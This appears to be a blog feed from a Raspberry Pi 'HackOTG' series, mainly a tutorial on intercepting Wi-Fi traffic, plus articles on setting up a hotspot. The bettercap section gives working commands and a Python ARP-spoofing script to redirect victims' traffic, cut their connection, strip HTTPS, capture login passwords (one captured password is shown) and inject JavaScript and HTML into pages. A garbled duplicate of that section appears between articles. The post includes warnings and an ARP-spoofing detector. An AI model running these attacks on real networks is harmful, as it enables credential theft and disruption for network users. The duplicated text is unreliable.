<p>Answer “No” when the installer asks whether non-superusers should be able to capture packets (that would make the dumpcap helper usable without root); we run tshark with sudo anyway. To use tshark on your wireless interface, use the following command:</p>
<pre>sudo tshark -i wlan0</pre>
<p>Now generate some traffic: log in to your HackOTG in another session and run “sudo apt-get update”. You can now see the DNS queries and downloads generated by the HackOTG itself:</p>
<pre class="output">[...]
21 45.328684570 192.168.1.51 → 192.168.1.1 DNS 87 Standard query 0xeac0 A mirrordirector.raspbian.org
22 45.331851556 192.168.1.51 → 192.168.1.1 DNS 83 Standard query 0xa5b2 A archive.raspberrypi.org
23 45.332182555 192.168.1.51 → 192.168.1.1 DNS 87 Standard query 0x9b47 AAAA mirrordirector.raspbian.org
24 45.332410554 192.168.1.51 → 192.168.1.1 DNS 83 Standard query 0xb93d AAAA archive.raspberrypi.org
[...]</pre>
<p>Now do the same, but first put the card in <em>promiscuous mode</em> before running the <em>tshark-command</em>. To put your card in <em>promiscuous mode</em>, do the following:</p>
<pre>sudo ifconfig wlan0 promisc</pre>
<p>To check if it worked, see the extra “P” flag at the end:</p>
<pre>netstat -i</pre>
<pre class="output">Kernel Interface table
Iface MTU RX-OK RX-ERR RX-DRP RX-OVR TX-OK TX-ERR TX-DRP TX-OVR Flg
lo 65536 55 0 0 0 55 0 0 0 LRU
usb0 1500 2039 0 0 0 502 0 0 0 BMRU
wlan0 1500 2482 0 1 0 147 0 0 0 BMRPU</pre>
<p>Now if we run our <em>tshark-command</em> again:</p>
<pre>sudo tshark -i wlan0</pre>
<p>And after generating some traffic on another device on the network… you won’t see any more than before. Two things stand in the way. In managed mode the WiFi chip only hands the host the frames addressed to its own MAC (plus broadcast and multicast), whatever the promiscuous flag says; and on a WPA2 network each client’s unicast traffic is encrypted with its own pairwise key, so even a frame you did pick up could not be decrypted. What promiscuous mode does give you on a wireless client is the broadcast traffic (ARP, DHCP, mDNS) next to your own packets. So the only question that remains is “How can we make the others on the network send their traffic through us?” Read on…</p>
<p>You can disable <em>promiscuous mode</em> with this command:</p>
<pre>sudo ifconfig wlan0 -promisc</pre>
<h2>See and interfere with others’ traffic (MitM)</h2>
<p>So to get all the traffic of the network (or from a specific set of hosts) through our system, we can use a lot of different techniques. Apart from physically being the gateway or sitting inline with the host, we have multiple techniques to reroute traffic when we are just a normal client on the network. Being in the position where all the traffic flows through you is called <a href="https://en.wikipedia.org/wiki/Man-in-the-middle_attack">Man in the Middle</a>. From there you’ll be able to influence the traffic.</p>
<p>One of the ways to redirect the traffic is by abusing the <a href="https://nl.wikipedia.org/wiki/Address_Resolution_Protocol">ARP-protocol</a>, which hosts use to find out which MAC address belongs to an IP address. ARP has no authentication at all: anybody can send a reply saying “192.168.1.1 is at my MAC” and the receiving host will update its ARP cache. Send that to the victim for the gateway’s IP, and to the gateway for the victim’s IP, and both sides hand their packets to us (basically, we tell everybody that we are the gateway). We then have to forward those packets to where they were going, otherwise the victim just loses its connection. There is a tool that does exactly this, <em>arpspoof</em>, but you’ll still have to find the IPs of the real gateway and of all victims yourself.</p>
<p>Many of the tools to redirect, change, filter and monitor traffic in a network are bundled in one called <a href="https://www.bettercap.org/">bettercap</a>. Its name is a nod to <em>ettercap</em>, an older and equally famous tool it was written to replace. Remember that bettercap is a great tool but stands on the shoulders of giants, using the same techniques (ARP spoofing, transparent proxying, sslstrip) to interfere with traffic.</p>
<p>The rest of this article will go over the installation and basic usage of the tool and how to use it on your HackOTG. In general, these tools always need some dependencies and total control over the interface, so using HackOTG is perfect for this purpose.</p>
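<p>To make the ARP mechanism concrete, here is an added example (written for this edit, not code from the HackOTG repository or from bettercap) that builds the two forged ARP replies arpspoof and bettercap keep re-sending, parses them back, and then runs them through an arpwatch-style check to show what a defender sees. It uses the gateway and target addresses from the nmap output further down; the attacker MAC 02:00:00:00:00:aa, the wlan0 interface in send_frames and the helper names are assumptions made for the illustration. Everything except send_frames runs offline.</p>

```python
"""ARP cache poisoning, the mechanism bettercap and arpspoof rely on, worked
through at the byte level, plus the arpwatch-style check that catches it.
Added example for this article: not code from the HackOTG repository or from
bettercap. Frame layout follows RFC 826 over Ethernet II. The attacker MAC
and the send-to-wire path are assumed values, not taken from the article."""
import ipaddress
import struct

ETH_P_ARP = 0x0806          # EtherType for ARP
ARP_REQUEST, ARP_REPLY = 1, 2


def mac_bytes(mac):
    """'aa:bb:cc:dd:ee:ff' -> 6 raw bytes."""
    return bytes.fromhex(mac.replace(":", ""))


def mac_str(raw):
    return ":".join(f"{b:02x}" for b in raw)


def build_arp_reply(sender_mac, sender_ip, target_mac, target_ip):
    """Ethernet frame carrying an ARP reply that claims 'sender_ip is at
    sender_mac', delivered directly to target_mac. Nobody asked, but hosts
    update their cache anyway: ARP has no authentication."""
    eth = mac_bytes(target_mac) + mac_bytes(sender_mac) + struct.pack("!H", ETH_P_ARP)
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, ARP_REPLY)   # htype=Ethernet, ptype=IPv4
    arp += mac_bytes(sender_mac) + ipaddress.IPv4Address(sender_ip).packed
    arp += mac_bytes(target_mac) + ipaddress.IPv4Address(target_ip).packed
    return eth + arp


def parse_arp(frame):
    """(opcode, sender_mac, sender_ip, target_mac, target_ip), or None if not ARP."""
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETH_P_ARP:
        return None
    opcode = struct.unpack("!H", frame[20:22])[0]
    return (opcode,
            mac_str(frame[22:28]), str(ipaddress.IPv4Address(frame[28:32])),
            mac_str(frame[32:38]), str(ipaddress.IPv4Address(frame[38:42])))


def poison_frames(attacker_mac, victim_mac, victim_ip, gateway_mac, gateway_ip):
    """The two frames the tools keep re-sending every few seconds: tell the
    victim that the gateway's IP lives at our MAC, and tell the gateway the
    same about the victim's IP. Both directions now pass through us; we must
    forward them on or the victim simply loses connectivity."""
    return [
        build_arp_reply(attacker_mac, gateway_ip, victim_mac, victim_ip),
        build_arp_reply(attacker_mac, victim_ip, gateway_mac, gateway_ip),
    ]


class ArpWatch:
    """Defender's view: remember the first MAC seen for each IP and flag any
    reply that maps the IP to another MAC. This is why the attack is not silent."""

    def __init__(self):
        self.table = {}

    def observe(self, frame):
        parsed = parse_arp(frame)
        if parsed is None or parsed[0] != ARP_REPLY:
            return None
        _, sender_mac, sender_ip, _, _ = parsed
        known = self.table.setdefault(sender_ip, sender_mac)
        if known != sender_mac:
            return f"ARP flip-flop: {sender_ip} was {known}, now claimed by {sender_mac}"
        return None


def send_frames(frames, iface="wlan0"):
    """Put the frames on the wire (Linux only, needs root). Not called by default;
    the rest of this file works offline."""
    import socket
    sock = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.htons(ETH_P_ARP))
    sock.bind((iface, 0))
    try:
        for frame in frames:
            sock.send(frame)
    finally:
        sock.close()


if __name__ == "__main__":
    # Gateway and target as in the nmap/bettercap output; attacker MAC is assumed.
    frames = poison_frames("02:00:00:00:00:aa",
                           "10:02:b5:d6:08:8a", "192.168.1.14",
                           "30:91:8f:9f:71:3c", "192.168.1.1")
    watch = ArpWatch()
    # A genuine reply from the real gateway first, then the forged one: the second is flagged.
    watch.observe(build_arp_reply("30:91:8f:9f:71:3c", "192.168.1.1",
                                  "10:02:b5:d6:08:8a", "192.168.1.14"))
    for frame in frames:
        print(parse_arp(frame), watch.observe(frame))
```

<p>Call send_frames(frames) as root, in a loop, to actually poison a test network you own; keeping the victim online is then up to kernel IP forwarding (net.ipv4.ip_forward), which bettercap takes care of for you. The ArpWatch half is the check worth running on your own network: a gateway IP that flips to a new MAC is the signature of exactly the commands that follow.</p>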
<h3>1. Installation</h3>
<p>There are a couple of ways to install <em>Bettercap</em>. The most stable way, and universal across all Linux distros, is to install it with the gem package manager of the <em>ruby</em> package. This gives you the Ruby-based 1.x release, whose command-line flags are the ones used in the rest of this article (the later Go rewrite, 2.x, has a different, interactive interface). First make sure you have these dependencies:</p>
<pre>sudo apt-get install build-essential ruby-dev libpcap-dev</pre>
<p>After retrieving the dependencies, install bettercap from the gem repository:</p>
<pre>sudo gem install bettercap</pre>
<h3>2. Usage</h3>
<p>Bettercap has a lot of options, so I will try to go through a couple scenarios, make sure you also take a look at <a href="https://www.bettercap.org/index.html#options">their documentation</a> to see the full range of capabilities.</p>
<p><em><strong>Don’t run the following commands without reading what they do: if other people are on your network, they will be affected. Nobody wants to hear people yelling when Netflix keeps dropping out or the printer doesn’t work anymore. Better safe than sorry.</strong></em></p>
<p>So if you run Bettercap as:</p>
<pre>sudo bettercap -I wlan0</pre>
<p>Bettercap will, by default, ARP-spoof every host on the network so that all their traffic is redirected through our interface. This is not a silent command: the gateway’s IP suddenly answering from a new MAC address is exactly what ARP monitoring tools look for, and anybody sniffing the network will see the stream of unsolicited ARP replies. Later on we will look at changing your MAC address (think of it as a fingerprint): the first three bytes identify the manufacturer, which is how nmap prints “Intel Corporate” or “Raspberry Pi Foundation” below, so spoofing it hides the make and model of your device. It hides the device, not the attack.</p>
<p>To attack only specific hosts we will need to know an IP or a MAC. This is where somebody who can copy commands becomes a hacker. There are many tools available to “scan” a network, but the famous <em><a href="https://nmap.org/">nmap</a></em> tool is a very good one. It is far too complex to explain all its features in this article, but check out the <a href="https://nmap.org/">documentation</a> if you want to know more. You can install it with <em>sudo apt-get install nmap</em> and then <strong>run the following command:</strong></p>
<pre>sudo nmap -sn 192.168.1.*</pre>
<p>This tool will go over all the addresses specified and give you back some info:</p>
<pre class="output">[...]
MAC Address: B8:27:EB:4E:0C:42 (Raspberry Pi Foundation)
Nmap scan report for 192.168.1.14
Host is up (-0.13s latency).
MAC Address: 10:02:B5:D6:08:8A (Intel Corporate)
Nmap scan report for vanboven.lan (192.168.1.20)
Host is up (-0.19s latency).
[...]</pre>
<p>If you can’t determine the IP or MAC, you have to look for certain traffic (later on in this article) to pinpoint a host. Attacking only a set of hosts is far more effective and puts less strain on the network and on your system. For a demonstration you can always just walk over to a device and read its IP from the settings.</p>
<p>If you don’t know the addresses to scan, or if you want to automate the command, use this script <strong>scan_networks.sh</strong> (it assumes the usual /24 network, like the 192.168.1.* above):</p>
<pre>#!/bin/sh
# scan_networks.sh: ping-scan the /24 of every IPv4 address this host has.
# The x.y.z.* range assumes a /24 netmask, just like the nmap command above.
for a in $(hostname -I); do
    case "$a" in
        *.*.*.*) sudo nmap -sn "${a%.*}.*" ;;   # IPv4 only; IPv6 addresses are skipped
    esac
done</pre>
<p>Simply run the following command to get all the hosts on the networks attached on all interfaces:</p>
<pre>sh scan_networks.sh</pre>
<p><strong>Now we can complete our <em>bettercap</em> command with a couple of victims to attack</strong> (comma-separated, without spaces, otherwise the shell passes the second address as a separate argument):</p>
<pre>sudo bettercap -I wlan0 -T 192.168.1.14,192.168.1.9</pre>
<p><strong>Another option is to specify a target by MAC address:</strong></p>
<pre>sudo bettercap -I wlan0 -T 01:23:45:67:89:10</pre>
<p><strong>Or to attack a range of IP addresses:</strong></p>
<pre>sudo bettercap -I wlan0 -T 192.168.1.1-30</pre>
<p><strong>You can also specify addresses to ignore (and attack all others):</strong></p>
<pre>sudo bettercap -I wlan0 --ignore 192.168.1.14,192.168.1.9</pre>
<h3>3. Example attacks</h3>
<p>What you created above will be your basic command: it redirects all traffic but does nothing with it, not even look at it. <strong>If you want to see the traffic that is going through, add -X (sniffer) to the command.</strong></p>
<pre>sudo bettercap -I wlan0 -T 192.168.1.14,192.168.1.9 -X</pre>
<pre class="output">[I] Starting [ spoofing:✔ discovery:✘ sniffer:✔ tcp-proxy:✘ udp-proxy:✘ http-proxy:✘ https-proxy:✘ sslstrip:✘ http-server:✘ dns-server:✘ ] ...
[I] [wlan0] 192.168.1.17 : B8:27:EB:D8:B4:4A / wlan0 ( Raspberry Pi Foundation )
[I] Found hostname dsldevice for address 192.168.1.1
[I] [GATEWAY] 192.168.1.1 : 30:91:8F:9F:71:3C / dsldevice ( Technicolor )
[I] [TARGET] 192.168.1.14 : 10:02:B5:D6:08:8A ( Intel Corporate )
[192.168.1.14 > 52.85.61.198:https] [HTTPS] https://api-v2.soundcloud.com/
[192.168.1.14 > 52.85.61.198:https] [HTTPS] https://l9bjkkhaycw6f8f4.soundcloud.com/
[192.168.1.14 > 52.85.62.252:https] [HTTPS] https://cf-hls-media.sndcdn.com/
[192.168.1.14 > 52.85.61.198:https] [HTTPS] https://l9bjkkhaycw6f8f4.soundcloud.com/
[192.168.1.14 > 52.85.62.252:https] [HTTPS] https://cf-hls-media.sndcdn.com/
[192.168.1.14 > 52.85.61.184:https] [HTTPS] https://api.soundcloud.com/
[192.168.1.14 > 52.85.62.252:https] [HTTPS] https://cf-hls-media.sndcdn.com/</pre>
<p>As you can see, I was listening to music on the <em>soundcloud</em> website from that device. We can also see the protocol used, etc. Note that for HTTPS connections the sniffer only shows the hostname, which it reads from the unencrypted start of the TLS handshake (SNI); the content itself stays encrypted. From here we can enable options to inject, alter, kill or redirect traffic. Another powerful and easy attack to show is to <strong>kill the traffic, which makes the device unable to reach the internet or any other network resource:</strong></p>
<pre>sudo bettercap -T 192.168.1.14 --kill</pre>
<p>You can also strip encryption (HTTPS, HSTS) to a certain extent with the proxy’s built-in <em>sslstrip</em>: when the victim loads a page over plain HTTP through our proxy, the https:// links in it are rewritten to http://, so the victim keeps talking cleartext to us while we talk HTTPS to the real site. This only works if the browser sends a plain-HTTP request in the first place, so it fails for sites the browser already knows as HSTS (preloaded, or visited before) and when the user types https:// themselves. The <em>-P POST</em> enables the POST parser, which prints the bodies of POST requests, where login forms carry the username and password:</p>
<pre>sudo bettercap -T 192.168.1.14 --proxy -P POST</pre>
<p><img src="/assets/bettercap_capture.png" alt="Bettercap capture" /></p>
<p>As you can see (above) a password was captured:</p>
<pre class="output">[REQUEST BODY]
RedirectUrl : http://www.standaard.be/
EmailOrUsername : username
Password : hellooooo</pre>
<p>If you can’t strip the encryption (the site is HSTS, or the user went to https:// directly), you can terminate the encryption yourself instead: with <em>--proxy-https</em> bettercap presents its own certificate to the victim and opens a separate TLS connection to the real site. Because that certificate is not signed by a trusted authority, modern browsers show a full-page warning. For HSTS hosts the warning cannot be clicked through at all, but on other sites victims often click through anyway, giving you a peek into that connection. Here is the command:</p>
<pre>sudo bettercap -T 192.168.1.14 --proxy --proxy-https -P POST</pre>
<p><img src="/assets/connection_private.png" alt="Connection private" /></p>
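<p>The “to a certain extent” of sslstrip and the “cannot be clicked through” of the HTTPS proxy both come down to a decision the victim’s browser makes before any packet leaves. The following added example (written for this edit, not bettercap code) models that decision: it parses Strict-Transport-Security headers as defined in RFC 6797, keeps a small HSTS store with a preload list, and answers whether the plain-HTTP downgrade the proxy relies on can happen for a given host. The host names, header values and the preloaded list in it are constructed for the demonstration; www.standaard.be is used only because it appears in the capture above.</p>

```python
"""How far sslstrip gets against HSTS. Added example for this article, not
bettercap code: it models the browser-side decision that determines whether
the plain-http downgrade bettercap's proxy relies on can happen at all.
Header parsing follows RFC 6797; the host names, header values and the
'preloaded' list used in the demo at the bottom are constructed."""
import time


def parse_hsts(header):
    """Parse a Strict-Transport-Security value into (max_age, include_subdomains).
    Returns None for a header without a usable max-age, which browsers ignore."""
    max_age, include_sub = None, False
    for directive in header.split(";"):
        name, _, value = directive.strip().partition("=")
        name = name.strip().lower()
        if name == "max-age":
            try:
                max_age = int(value.strip().strip('"'))
            except ValueError:
                return None
        elif name == "includesubdomains":
            include_sub = True
    return None if max_age is None or max_age < 0 else (max_age, include_sub)


class HstsStore:
    """Minimal model of a browser's HSTS cache plus its built-in preload list."""

    def __init__(self, preloaded=(), now=time.time):
        self.now = now
        # Preloaded hosts never expire and always cover their subdomains.
        self.entries = {host: (float("inf"), True) for host in preloaded}

    def remember(self, host, header):
        """Called when an https response from host carried the header. The catch
        for the victim: the browser only learns this after one clean https visit,
        and a proxy that already sits in the middle can strip the header."""
        parsed = parse_hsts(header)
        if parsed is None:
            return
        max_age, include_sub = parsed
        if max_age == 0:                      # max-age=0 tells the browser to forget the host
            self.entries.pop(host, None)
        else:
            self.entries[host] = (self.now() + max_age, include_sub)

    def protects(self, host):
        """True if the browser rewrites http://host to https before any request leaves."""
        labels = host.split(".")
        for i in range(len(labels)):
            entry = self.entries.get(".".join(labels[i:]))
            if entry is None or entry[0] < self.now():
                continue
            if i == 0 or entry[1]:            # exact host, or an ancestor with includeSubDomains
                return True
        return False


def sslstrip_can_downgrade(store, host, typed_scheme):
    """sslstrip only works if the victim's browser sends a plain-http request the
    proxy can rewrite: an HSTS entry makes it go straight to https, and a user
    who typed https:// never gives the proxy a cleartext request to work with."""
    return typed_scheme == "http" and not store.protects(host)


if __name__ == "__main__":
    clock = [1000.0]
    store = HstsStore(preloaded=["example.com"], now=lambda: clock[0])
    store.remember("www.standaard.be", "max-age=31536000")       # constructed header value
    for host, scheme in [("www.standaard.be", "http"), ("api.example.com", "http"),
                         ("shop.standaard.be", "http"), ("shop.standaard.be", "https")]:
        print(f"{scheme}://{host}: downgrade possible = {sslstrip_can_downgrade(store, host, scheme)}")
```

<p>The store also shows why the capture above worked: a host that only ever served the login form over http, or that the victim had never visited over https, has no entry, so the first request goes out in cleartext and the proxy gets to rewrite everything after it. The same entry is what turns the --proxy-https certificate warning into a hard block instead of a click-through.</p>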
<p>Now if we have control over the unencrypted data, we can change it in any way we want. Some easy examples for injection attacks are the following, you can still add the force https option to these:</p>
<p><strong>Make all pages pink:</strong></p>
<pre>sudo bettercap -I wlan0 -T 192.168.1.14 --proxy-module injectcss --css-data '*{background-color:#fd3078!important; color:white!important}'</pre>
<p><strong>Give a popup “HACKED”:</strong></p>
<pre>sudo bettercap -I wlan0 -T 192.168.1.14 --proxy-module injectjs --js-data 'alert("hacked");'</pre>
<p><strong>Play youtube-video fullscreen on all visited pages:</strong></p>
<pre>sudo bettercap -I wlan0 -T 192.168.1.14 --proxy-module injecthtml --html-file baby.html</pre>
<p>with <em>baby.html</em> containing:</p>
<pre>&lt;iframe style="position:absolute; z-index:10000" width="100%" height="100%"
src="https://www.youtube.com/embed/kffacxfA7G4?autoplay=1" frameborder="0" allowfullscreen&gt;&lt;/iframe&gt;
&lt;div style="position:absolute;width:100%;height:100%;z-index:10001;"&gt;&lt;/div&gt;</pre>
<p>To give some easy demos, I made a script that contains these commands and a bit more. If you take a look at <a href="https://github.com/larsveelaert/HackOTG">this github-repo</a>, you can find all the files we use for the HackOTG, including <a href="https://github.com/larsveelaert/HackOTG/blob/master/mitm.sh">mitm.sh</a>, a general <em>bettercap</em> script to use on any device. Just run it with <em>sh</em> and answer the questions to automate the commands shown above.</p>
<p>So here we can end our attack on networks we already know the password to. Next we will dive into other ways to get control over a victim’s traffic.</p>Lars Veelaert
This will give a popup or alert on most modern browsers, but often victims will still go through, giving you a peek in that connection. Here is the command: sudo bettercap -T 192.168.1.14 --proxy --proxy-https -P POST Now if we have control over the unencrypted data, we can change it in any way we want. Some easy examples for injection attacks are the following, you can still add the force https option to these: Make all pages pink: sudo bettercap -I wlan0 -T 192.168.1.14 --proxy-module injectcss --css-data '*{background-color:#fd3078!important; color:white!important}' Give a popup “HACKED”: sudo bettercap -I wlan0 -T 192.168.1.14 --proxy-module injectjs --js-data 'alert("hacked");' Play youtube-video fullscreen on all visited pages: sudo bettercap -I wlan0 -T 192.168.1.14 --proxy-module injecthtml --html-file baby.html #baby.html <iframe style="position:absolute; z-index:10000" width="100%" height="100%" src="https://www.youtube.com/embed/kffacxfA7G4?autoplay=1" frameborder="0" allowfullscreen></iframe> <div style="position:absolute;width:100%;height:100%;z-index:10001;"></div>' To give some easy demo’s, I made a script that contains these commands and a bit more. If you take a look at this github-repo, you can find all the files we use for the HackOTG, and the file mitm.sh, which is a general bettercap-_script to use on any device. Just run it with _sh and answer the questions to automate the commands shown above. So here we can end our attack on networks we already know the password to. Next we will dive into other ways to get control over a victims traffic.HackOTG (v1.3): Creating our own hotspot on boot2017-10-11T00:00:00+00:002017-10-11T00:00:00+00:00https://lvlrt.github.io/2017/10/11/hackotg-v1-3-creating-our-own-hotspot-on-boot<p><img src="/assets/wifi_pi.png" alt="Header" /></p>
<p><em>This article is part of a series: <a href="/2017/10/07/hackotg-v1-0-universal-portable-security-platform/">you can find the first article here</a>. If you missed the previous one, <a href="/2017/10/11/hackotg-v1-2-basic-connectivity-to-internet/">it is here</a>.</em></p>
<h2>Checking the capabilities of our WiFi-interface</h2>
<p>On any system you can run the following command to get the capabilities of the wireless interfaces attached to that device:</p>
<pre>iw list</pre>
<p>In the output of our Pi Zero W, we can see that it supports AP mode, which means we can make the HackOTG create a hotspot on boot, so we can control the device from a distance or without making use of the Ethernet-to-USB interface that the HackOTG emulates.</p>
<p>In the same output you can also see that we can combine modes, but with a couple restrictions:</p>
<pre class="output">#{ managed } <= 1, #{ AP } <= 1, #{ P2P-client } <= 1, #{ P2P-device } <= 1,
total <= 4, #channels <= 1</pre>
<p>This means that the interface can be in AP and client (managed) mode at the same time: the HackOTG can stay connected to an existing WiFi network and serve its own hotspot next to it. Because of <em>#channels <= 1</em>, both must use the same channel, so the channel of your AP is dictated by the network you join.</p>
<p>This is quite advanced but good to keep in mind. In our case we want an AP that starts on boot, so we can make our first connection. If you want to run the AP and be a client of another network at the same time, you have to know the environment (the SSID, key and channel of that network) beforehand and configure it first. That is not practical for a device you carry around, so configure such a setup over the emulated Ethernet-to-USB connection when you need it. You can find more on combined modes <a href="https://wiki.archlinux.org/index.php/software_access_point">here</a>.</p>
<h2>Creating the hotspot</h2>
<p><strong>Install the necessairy packages:</strong></p>
<pre>sudo apt-get install hostapd dnsmasq</pre>
<p>Now we must create a configuration file containing all the settings of the hotspot. I like to keep all configurations files in the home directory, so they are easily changed, copied and reused. We will be combining a lot of the programs in different setups, so it’s easier if they are easy to find.</p>
<p><strong>Create the file <em>hostapd.conf</em>:</strong> (Change ssid and wpa_passphrase if you want to. The passphrase must be 8 to 63 characters, and "raspberry" is only acceptable for a demo. hostapd does not strip trailing comments from a value line, so keep comments on their own lines.)</p>
<pre># network name and key (8-63 characters); change both
ssid=HackOTG
wpa_passphrase=raspberry
interface=wlan0
driver=nl80211
# 2.4 GHz 802.11g on channel 6
hw_mode=g
channel=6
# 0 = no MAC address filtering; 1 = open system authentication only (no shared-key auth)
macaddr_acl=0
auth_algs=1
ignore_broadcast_ssid=0
# wpa=2 means WPA2 (RSN) only, so wpa_pairwise (WPA1) is not used
wpa=2
wpa_key_mgmt=WPA-PSK
wpa_pairwise=TKIP
# AES-CCMP only for WPA2; do not add TKIP here
rsn_pairwise=CCMP</pre>
<p><strong>Start the hotspot:</strong></p>
<pre>sudo killall wpa_supplicant dhcpcd hostapd dnsmasq #stop everything else that may hold wlan0
sudo mount --bind /dev/urandom /dev/random #workaround: hostapd reads /dev/random, which can block for minutes on a Pi with little entropy
sudo hostapd hostapd.conf</pre>
<h2>Run a DHCP-server on the hotspot-interface</h2>
<p>An easy and lightweight DHCP server is "dnsmasq". We already installed the package, so we go on and create the config file.</p>
<p><strong>dnsmasq.conf:</strong></p>
<pre class="output"># disables dnsmasq reading any other files like /etc/resolv.conf for nameservers
no-resolv
# Interface to bind to
interface=wlan0
# Specify starting_range,end_range,lease_time
dhcp-range=10.0.0.3,10.0.0.20,12h
# upstream nameservers dnsmasq forwards to; clients are handed the HackOTG itself (10.0.0.1) as DNS server and router
server=8.8.8.8
server=8.8.4.4</pre>
<p><strong>Start the DHCP-server and configure the interface:</strong></p>
<pre>sudo dnsmasq -C dnsmasq.conf
sudo ifconfig wlan0 up 10.0.0.1 netmask 255.255.255.0 #clients only get a lease once wlan0 has this address</pre>
<h2>Putting it all together</h2>
<p>We can make scripts to start or stop the hotspot on-demand. Just create these scripts and run them to put the HackOTG in and out hotspot-mode.</p>
<p><strong>hotspot_start.sh:</strong></p>
<pre>if [ $( mount | grep urandom | wc -l ) -eq 0 ]; then
sudo mount --bind /dev/urandom /dev/random
fi
sh /home/pi/hotspot_stop.sh
sudo hostapd /home/pi/hostapd.conf&
sudo dnsmasq -C /home/pi/dnsmasq.conf&
sleep 2
sudo ifconfig wlan0 up 10.0.0.1 netmask 255.255.255.0</pre>
<p><strong>hotspot_stop.sh:</strong></p>
<pre>sudo killall dnsmasq hostapd dhcpcd wpa_supplicant
sudo ifconfig wlan0 0.0.0.0</pre>
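<p>A stricter version of <em>hotspot_start.sh</em>, added here as an example and not part of the original series: it validates <em>hostapd.conf</em> (passphrase length, WPA2-only, CCMP-only, interface present) and checks <em>iw list</em> for AP mode before touching the interface, because a misconfigured hostapd started in the background just dies and leaves you without a hotspot and without a clue. The config paths under /home/pi and the "start" entry point are assumptions.</p>

```shell
#!/bin/sh
# Added example, not from the original post: validate hostapd.conf before
# starting the hotspot. hostapd refuses passphrases outside 8..63 characters and
# would otherwise die quietly in the background. The config/dnsmasq paths and the
# "start" entry point are assumptions.

# Print the value of KEY from a "key=value" file (first match, empty if absent).
conf_get() {  # conf_get FILE KEY
    sed -n "s/^$2=//p" "$1" | head -n 1
}

# Return 0 if FILE describes a WPA2-only, CCMP-only AP with a usable passphrase;
# otherwise print each problem found and return 1.
validate_hostapd_conf() {  # validate_hostapd_conf FILE
    file=$1; errors=0
    [ -r "$file" ] || { echo "cannot read $file"; return 1; }

    pass=$(conf_get "$file" wpa_passphrase)
    if [ "${#pass}" -lt 8 ] || [ "${#pass}" -gt 63 ]; then
        echo "wpa_passphrase must be 8..63 characters (got ${#pass})"; errors=1
    fi
    ssid=$(conf_get "$file" ssid)
    if [ -z "$ssid" ] || [ "${#ssid}" -gt 32 ]; then
        echo "ssid must be 1..32 characters"; errors=1
    fi
    # wpa=2 selects WPA2 (RSN) only; wpa=1 or wpa=3 would also offer WPA1
    [ "$(conf_get "$file" wpa)" = "2" ] || { echo "wpa must be 2 (WPA2 only)"; errors=1; }
    # with wpa=2 only rsn_pairwise is used, and it must not offer TKIP
    case "$(conf_get "$file" rsn_pairwise)" in
        CCMP) ;;
        *) echo "rsn_pairwise must be exactly CCMP"; errors=1 ;;
    esac
    [ -n "$(conf_get "$file" interface)" ] || { echo "interface is missing"; errors=1; }
    return "$errors"
}

# Bring the AP up only when the config is sane and the card reports AP mode.
# Needs root; runs only when the script is invoked as "hotspot_start.sh start".
hotspot_start() {  # hotspot_start HOSTAPD_CONF DNSMASQ_CONF
    validate_hostapd_conf "$1" || return 1
    iface=$(conf_get "$1" interface)
    # `iw list` prints "* AP" under "Supported interface modes" when AP mode exists
    iw list 2>/dev/null | grep -q '\* AP$' || { echo "no AP mode in iw list"; return 1; }
    # same workaround as the post: hostapd reads /dev/random, which can block on a Pi
    mount | grep -q urandom || mount --bind /dev/urandom /dev/random
    killall dnsmasq hostapd dhcpcd wpa_supplicant 2>/dev/null || true
    ifconfig "$iface" up 10.0.0.1 netmask 255.255.255.0
    hostapd -B "$1" || { echo "hostapd failed to start"; return 1; }  # -B: daemonize
    dnsmasq -C "$2"
}

if [ "${1-}" = "start" ]; then
    hotspot_start /home/pi/hostapd.conf /home/pi/dnsmasq.conf
fi
```

<p>Run it as <em>sudo sh hotspot_start.sh start</em>; a bad passphrase or a TKIP cipher is reported on the terminal instead of disappearing into a background process, and <em>hostapd -B</em> only returns success once the AP is actually up, so the <em>sleep 2</em> guess is no longer needed.</p>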
<p><em>(optional)</em> You should add the <em>hotspot_stop.sh</em> script to the <em>connect_wifi_ssid.sh</em> script from <a href="https://larsveelaert.github.io/2017/10/11/hackotg-v1-2-basic-connectivity-to-internet/">this article</a>. Otherwise you will not be able to connect to the internet anymore, because hostapd will still be occupying wlan0. Add the <em>hotspot_stop.sh</em> command to the script like this:</p>
<pre>sh /home/pi/hotspot_stop.sh
sudo wpa_supplicant -B -i wlan0 -D wext -c ssid.conf
sudo dhcpcd --nohook wpa_supplicant wlan0</pre>
<h2>Start the hotspot on boot</h2>
<p>On Debian-based distros there is a file <em>/etc/rc.local</em> that runs the commands put in it (as root) once the device has fully booted. Simply add a line with the <em>hotspot_start.sh</em> command to it (don't forget the & at the end to make it a background process, otherwise rc.local never finishes). The command must go before the line containing <em>"exit 0"</em>.</p>
<p><strong>/etc/rc.local:</strong></p>
<pre># By default this script does nothing.
# Print the IP address
_IP=$(hostname -I) || true
if [ "$_IP" ]; then
printf "My IP address is %s\n" "$_IP"
fi
# put your scripts to boot here
sh /home/pi/hotspot_start.sh&
exit 0</pre>
<p>Now you can restart the device and, if everything is OK, it will create the WiFi hotspot named <em>"HackOTG"</em> with the password <em>"raspberry"</em>. If after a minute you still can't pick up the signal, you can still log in to your device over the emulated Ethernet-to-USB device and run <em>sudo hostapd /home/pi/hostapd.conf</em> in the foreground to see why it fails. Now you have 2 ways to connect to your HackOTG!</p>
<p>In <a href="/2017/10/31/hackotg-v1-4-see-all-traffic-on-a-network/">the next article</a> we will further explore the possibilities to see and control traffic on a network.</p>
<blockquote class="wp-embedded-content" data-secret="UxtFeiWmpQ">
<p>
<a href="/2017/10/31/hackotg-v1-4-see-all-traffic-on-a-network/">HackOTG (v1.4): See all traffic on a network with Promiscuous mode and Bettercap</a>
</p>
</blockquote>Lars Veelaert
HackOTG (v1.2): Basic connectivity to the internet2017-10-11T00:00:00+00:002017-10-11T00:00:00+00:00https://lvlrt.github.io/2017/10/11/hackotg-v1-2-basic-connectivity-to-internet<p><em>This article is part of a series: <a href="/2017/10/07/hackotg-v1-0-universal-portable-security-platform/">you can find the first article here</a>. If you missed the previous one, <a href="/2017/10/10/hackotg-v1-1-integrating-the-cable-for-more-portability/">it is here</a>.</em></p>
<p>After the previous article, we can plug-in our HackOTG and log in with SSH over the emulated Ethernet-adapter. Now, we don’t have internet-connectivity yet… Sometimes we will want to have an internet-connection to install new packages, backup our device or have a new way to connect to our device. In this article we will go through the basics of networking on your HackOTG.</p>
<h2>Setting up the interface and scan</h2>
